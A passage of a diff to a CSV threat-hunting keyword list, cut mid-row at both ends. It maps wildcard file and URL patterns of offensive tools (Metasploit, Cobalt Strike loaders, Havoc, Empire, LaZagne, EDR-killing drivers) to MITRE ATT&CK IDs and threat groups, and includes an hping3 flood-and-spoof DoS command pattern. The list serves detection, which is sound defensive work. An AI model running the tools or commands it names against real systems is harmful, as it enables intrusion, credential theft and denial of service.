development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*HostExploiter.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*HostingCLR_inject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*HostingCLRx64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*houqingv1.0.zip*","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" -"*hpe_sim_76_amf_deserialization*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*hping2.h*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1296","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" -"*hping3 -*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1296","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*hpe_sim_76_amf_deserialization*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*hping2.h*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*hping3 -*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" "*hping3 * --flood --frag --spoof * --destport*","offensive_tool_keyword","hping3","HPING3 DoS","T1498 - T1095 - T1045","TA0040 - TA0001 - TA0043","N/A","N/A","DOS","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*HRShell*client.py*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*HRShell*server.py*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" -"*hta_evasion.hta*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*hta_evasion.hta*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*HtaPowershellGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*hta-to-javascript-crypter*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*HtaVBSGenerator.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*htdigest2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*htdigest2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*html/js/beacons.js*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*html/scripts/merlin.js*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Html-Injection-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*Html-Injection-Read-File-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*HTMLSmuggler-main*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z" -"*HTool-Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*HTool-Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*htrgouvea/nipe*","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z" "*htshells-master*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*http* | hakrawler -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*http*/127.0.0.1*:1337*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*http*/charlotte.dll*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" -"*http*/demon.dll","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*http*/demon.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*http*/demos/butcher/index.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*http*/john/Test/raw/master/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*http*/charlotte.dll*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*http*/demon.dll","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*http*/demon.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*http*/demos/butcher/index.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*http*/john/Test/raw/master/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*http*/localhost*:1337*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*http*/zha0gongz1*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*http*://*/Terminator.sys","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" @@ -11304,7 +11457,7 @@ "*http*://127.0.0.1:5556*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*http*://localhost:4433*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*http*://localhost:5556*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*http*:3000/hook.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*http*:3000/hook.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*http*:3200/manjusaka*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*http*:801/bq1iFEP2*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 